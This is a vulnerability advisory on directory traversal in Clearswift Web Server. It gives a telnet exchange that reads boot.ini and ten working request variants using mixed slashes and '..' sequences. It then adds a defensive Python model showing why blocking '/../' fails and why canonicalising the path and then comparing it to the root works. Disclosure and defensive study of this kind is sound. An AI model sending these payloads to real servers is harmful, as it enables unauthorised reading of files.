DESCRIPTION: It is possible to read arbitrary files on the remote server by prepending /foobar/\../\../ (a mix of forward and back slashes with ".." sequences) in front of the file name.
EXAMPLE:
telnet xx.xx.xx.xx 80
Trying xx.xx.xx.xx...
Connected to xx.xx.xx.xx.
Escape character is '^]'.
GET /foobar/..\\..\\..\\..\\..\\..\\boot.ini HTTP/1.0

HTTP/1.0 200 Ok
Date: Do, 27 Jul 2004 14:30:07 GMT
Server: Clearswift Web Server
Content-length: 186
Content-type: application/octet-stream

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect
Connection closed by foreign host.
Here are several more request variants that also work:
GET /foobar/..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar/\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar//..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar//..\\..//..\\..//boot.ini HTTP/1.0
GET /foobar/\../\../\../\../\boot.ini HTTP/1.0
GET /foobar/../../../../boot.ini HTTP/1.0
GET /foobar\..\..\..\..\boot.ini HTTP/1.0
IMPACT: This vulnerability can be used to retrieve any file from the partition on which the Clearswift web server is installed. The number of "/", "\" and ".." sequences required depends on the ServerRoot setting (the location of the virtual / directory), i.e. on how many directories deep below the partition root the web root lies. Surplus ".." sequences do no harm, since Windows stops at the partition root; this is why the requests with four and with six ".." both return boot.ini.
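The following script is an added example, not part of the advisory and not Clearswift's code. It models how a Windows file API resolves the request path appended to the ServerRoot (both "/" and "\" act as separators, ".." pops one directory, and ".." at the drive root is a no-op), runs the advisory's request paths through that model, and contrasts a typical inadequate fix (rejecting only the literal "/../") with the check a practitioner should use: canonicalise first, then verify the result still lies under the web root. The ServerRoot C:\Clearswift\Web\htdocs is an assumption chosen for illustration; the advisory does not disclose the real path.

```python
import re

# Assumed ServerRoot for illustration only; the advisory does not give the real one.
ASSUMED_SERVER_ROOT = r"C:\Clearswift\Web\htdocs"

# The request paths listed in the advisory, verbatim (raw strings keep the backslashes).
ADVISORY_PATHS = [
    r"/foobar/..\\..\\..\\..\\..\\..\\boot.ini",
    r"/foobar/..\\..\\..\\..\\boot.ini",
    r"/foobar/..\..\..\..\..\..\\boot.ini",
    r"/foobar/..\..\..\..\..\..\boot.ini",
    r"/foobar/\..\..\..\..\..\boot.ini",
    r"/foobar//..\\..\\..\\..\\boot.ini",
    r"/foobar//..\\..//..\\..//boot.ini",
    r"/foobar/\../\../\../\../\boot.ini",
    r"/foobar/../../../../boot.ini",
    r"/foobar\..\..\..\..\boot.ini",
]


def split_segments(path):
    """Split on both separators, as Windows file APIs do; runs of separators and
    empty pieces ('//', '/\\') collapse to nothing."""
    return [s for s in re.split(r"[\\/]+", path) if s]


def root_depth(server_root):
    """Number of directory components between the drive and the ServerRoot.
    The advisory's /foobar/ prefix adds one more level that a '..' must undo."""
    _drive, rest = server_root.split(":", 1)
    return len(split_segments(rest))


def windows_resolve(server_root, request_path):
    """Model of how the OS resolves ServerRoot + request path on Windows."""
    drive, rest = server_root.split(":", 1)
    stack = split_segments(rest)
    for seg in split_segments(request_path):
        if seg == ".":
            continue
        if seg == "..":
            if stack:            # at the drive root '..' is a no-op, so surplus '..' are harmless
                stack.pop()
            continue
        stack.append(seg)
    return drive + ":\\" + "\\".join(stack)


def blocklist_check(request_path):
    """A hypothetical, inadequate fix: reject only the literal '/../'.
    Returns True when the request would be allowed through."""
    return "/../" not in request_path


def canonical_check(server_root, request_path):
    """The robust check: resolve the path first, then require that the result
    is still inside the web root (case-insensitive, as NTFS is)."""
    root = windows_resolve(server_root, "").lower()
    resolved = windows_resolve(server_root, request_path).lower()
    return resolved.startswith(root + "\\")


def classify(server_root, paths):
    """(request, resolved file, allowed by blocklist?, allowed by canonical check?) per path."""
    return [
        (p, windows_resolve(server_root, p), blocklist_check(p), canonical_check(server_root, p))
        for p in paths
    ]


if __name__ == "__main__":
    print("ServerRoot depth below drive:", root_depth(ASSUMED_SERVER_ROOT))
    for req, resolved, via_blocklist, via_canonical in classify(ASSUMED_SERVER_ROOT, ADVISORY_PATHS):
        print(f"{req:45} -> {resolved:14} blocklist={via_blocklist!s:5} canonical={via_canonical}")
    print("/index.html ->", windows_resolve(ASSUMED_SERVER_ROOT, "/index.html"),
          "canonical=", canonical_check(ASSUMED_SERVER_ROOT, "/index.html"))
```

Run as-is, every advisory path resolves to C:\boot.ini; the "/../" blocklist lets nine of the ten through (it only stops the pure forward-slash variant), whereas the canonicalise-then-compare check rejects all ten and still accepts an ordinary request such as /index.html. The same pattern applies to any server: never match on separator strings in the raw URL, decode and resolve first, then compare against the root.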